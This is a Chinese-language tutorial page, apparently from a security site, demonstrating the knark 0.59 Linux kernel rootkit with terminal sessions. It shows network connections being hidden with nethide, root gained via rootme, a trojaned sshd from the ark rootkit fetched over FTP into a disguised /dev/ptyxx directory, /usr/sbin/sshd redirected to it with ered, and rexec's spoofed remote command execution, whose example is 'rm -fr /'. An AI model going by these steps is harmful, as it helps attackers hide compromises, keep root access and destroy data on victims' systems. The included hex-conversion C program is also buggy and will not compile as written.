[root@chi knark-0.59]# cat /proc/net/tcp
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 0519A8C0:0017 0119A8C0:11D2 01 00000002:00000000 01:00000019 00000000 0 0 857
1: 00000000:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 574
2: 00000000:0203 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 530
3: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 509
4: 00000000:0062 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 505
5: 00000000:004F 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 504
........more

[root@chi knark-0.59]# cat /proc/net/udp
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 00000000:0206 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 503
1: 00000000:0205 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 502
2: 00000000:03A9 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 360
3: 00000000:0400 00000000:0000 07 00000000:00000000 00:FFFFFFFF 00000000 0 0 336
4: 00000000:006F 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 319

.......more

找到对应的16进制,没有办法16进制太难看了.自己写个程序来看看是什么东西啦?

[root@chi chi]# cat >to16.c
#include <stdio.h>
#include <string.h>

int main(void)
{
int i ;
char g;

printf("please make your choice\n");
printf("form Decimal to Hex, enter d\n");
printf("form Hex to Decimal, enter h\n");

if(getchar() == d)
{
printf ("please enter a decimal :");
scanf("%d",&i);
printf("print it out in Hex :");
printf("0x%.4x",i);
}
else
{
printf("please enter a Hex :");
scanf("%x",&g);
printf("print it out in Decimal :");
printf("%d\n",g);
}
}

[root@chi chi]# gcc -o to16 to16.c
[root@chi chi]# ./to16please make your choice
form Decimal to Hex, enter d
form Hex to Decimal, enter h
h
please enter a Hex :0017 <------- 16进制
print it out in Decimal :23 <------- 23也就是telnet的端口啦

[root@chi chi]#

 

Telnet的端口是找到了, 还有那个ntalk的端口是518, 如果你打入后就会找到下面两个:

0: 0519A8C0:0017 0119A8C0:11D2 01 00000002:00000000 01:00000019 00000000 0 0 857

0: 00000000:0206 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 503
 
然后用nethide中:

[root@chi knark-0.59]# ./nethide ":0017"

nethide.c by Creed @ #hack.se 1999 <creed@sekure.net>

Done: ":0017" is now removed

[root@chi knark-0.59]# ./nethide ":0206"

nethide.c by Creed @ #hack.se 1999 <creed@sekure.net>

Done: ":0206" is now removed
[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:smtp *:* LISTEN <--------- telnet连线变没有了!
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:talk *:* <--------- ntalk变没有了!

 

下面轮到哪个程序啦,就rootme吧, 这个很好理解, 就是以root的权限执行一个程序.

[chi@chi chi]$ cd knark*
[chi@chi knark-0.59]$ ls <-------- $表示你还不是root

Makefile ered knark.o nethide rootme taskhack
README hidef modhide.o rexec src unhidef
[chi@chi knark-0.59]$ ./rootme /bin/sh

rootme.c by Creed @ #hack.se 1999 <creed@sekure.net>

Do you feel lucky today, hax0r?
bash# id <-------- #,看到你的id了没有, root啊!
uid=0(root) gid=0(root) groups=500(chi)
bash#

由于taskhack编辑不成功, 所以没有测试!下面来测试那个重定向程序ered:

[root@chi knark-0.59]# mkdir /dev/ptyxx
[root@chi knark-0.59]# cd /dev/ptyxx
[root@chi ptyxx]# ftp 192.168.25.1 <-------- ftp上别的机子下在sshd程序
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0).
Name (192.168.25.1:chi): chi
331 Password required for chi.
Password:
230 User chi logged in.
Remote system type is Windows_NT.
ftp> ls <-------- 这个包其实就是ark rootkit里的!
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
12-08-00 11:52AM 18052 ark
12-08-00 11:48AM 33 compile
12-08-00 11:48AM 117311 du
12-08-00 11:48AM 22459 killall
12-08-00 11:48AM 27896 login-normal
12-08-00 11:48AM 43336 login-shadow
12-08-00 11:48AM 184023 ls
12-08-00 11:48AM 258612 netstat
12-08-00 11:48AM 47388 ps
12-08-00 11:48AM 24147 pstree
12-08-00 11:48AM 1923 README
12-08-00 11:48AM 655916 sshd
12-08-00 11:48AM 28696 syslogd
12-08-00 11:48AM 68692 top
12-08-00 11:52AM 138 VERSION
226 Transfer complete.
ftp> get sshd <--- 下载sshd
local: sshd remote: sshd
200 PORT command successful.
150 Opening ASCII mode data connection for sshd(655916 bytes).
WARNING! 952 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
655916 bytes received in 0.72 secs (8.9e+02 Kbytes/sec)
ftp> by
221
[root@chi ptyxx]#

下面使用ered来重定向文件:

[root@chi ptyxx]# ls
sshd
[root@chi ptyxx]# chmod 777 sshd
[root@chi ptyxx]# cd /home/chi/knark*
[root@chi knark-0.59]# ./ered

ered.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./ered <from> <to>
./ered -c (clear redirect-list)
ex: ./ered /usr/local/sbin/sshd /usr/lib/.hax0r/sshd_trojan
[root@chi knark-0.59]# ./ered /usr/sbin/sshd /dev/ptyxx/sshd

ered.c by Creed @ #hack.se 1999 <creed@sekure.net>

Done: /usr/sbin/sshd -> /dev/ptyxx/sshd
[root@chi knark-0.59]#

现在如果有人运行/usr/sbin/sshd, 其实他运行的是我们的/dev/ptyxx/sshd.

接下去还有个rexec,我觉得这个工具没有多大的用处, 只是用来发送伪装的udp包来让远程系统执行你要用的命令:

[root@chi knark-0.59]# ./rexec

rexec.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./rexec <src_addr> <dst_addr> <command> [args ...]
ex: ./rexec www.microsoft.com 192.168.1.77 /bin/rm -fr /

............

对knark的介绍要告一段落了!


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Hackfing in Mysql5
·SQLServer提升权限相关命令
·基于ARP欺骗的嗅探原理
·Man-in-the-middle-attacks In P
·在TCP三次握手后插入伪造的TCP包
·创建高权限进程
·再谈Radmin——对“自己丰衣足食
·简介绕过DarkSpy的方法
·利用HTTP指令进行攻击-Cache篇
·管理员组获取系统权限的完美解决
·SQL Server提升权限相关命令及防
·PPPoE验证与利用
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved